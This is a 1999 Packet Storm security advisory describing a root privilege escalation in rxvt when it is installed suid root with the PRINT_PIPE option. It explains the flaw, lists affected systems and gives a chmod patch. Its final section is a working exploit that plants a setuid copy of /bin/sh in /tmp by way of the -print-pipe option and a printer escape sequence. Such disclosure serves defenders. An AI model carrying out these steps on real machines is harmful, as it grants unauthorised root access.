rxvt.sh

Published 17 Aug 1999 00:00:00. Reported by Packet Storm. Type: packetstorm. Source: packetstormsecurity.com

rxvt has a security flaw when running suid root, allowing easy root privilege escalation.

Code
```
There is a major security hole in rxvt, a terminal emulator for X, when it
is run on systems suid root, as is required on many configurations in order to
write to the utmp file. It is obvious from the code that this program was
not written to be run suid root; it's a pity that sysadmins that install the
compiled versions of this sort of code don't see the same warnings of 'run
suid root at your own risk' that the people that put together a distribution
with it that way see in the makefile.

The conditions that allow this particular hole to be exploited are rxvt
compiled with the PRINT_PIPE option and running suid root. The program
sets the pipe to "lpr", without a pathname, but it's even easier than that
to exploit because we can set the pipe to whatever we want with the -print-pipe
option on the rxvt command line. Although the program gives up its root
privileges when forking to run a shell or other command, the original program
continues running suid root for the entire execution of the program.
Because the popen() call runs as root, whatever program that pipe opens
will execute immediately as root. In order to start the printer pipe, the
vt100 printer-on command is ESC[5i. The pipe can then be closed with the
printer-off command, ESC[4i. Exploiting this is extremely easy.

Program: rxvt
Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
rxvt suid root (and compiled with PRINT_PIPE)
Requirements: account on system, X server
Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
Security Compromise: root
Author: Dave M. ([email protected])
Synopsis: rxvt fails to give up root privileges before
opening a pipe to a program that can be specified
by the user.

Exploit:
1. Set DISPLAY environment variable if necessary so you can use x clients.
2. In user shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. In rxvt xclient:
$ cat
ESC[5i
ESC[4i
(The client will close at this point with a broken pipe)
4. $ /tmp/rxsh
# whoami
root
#
```
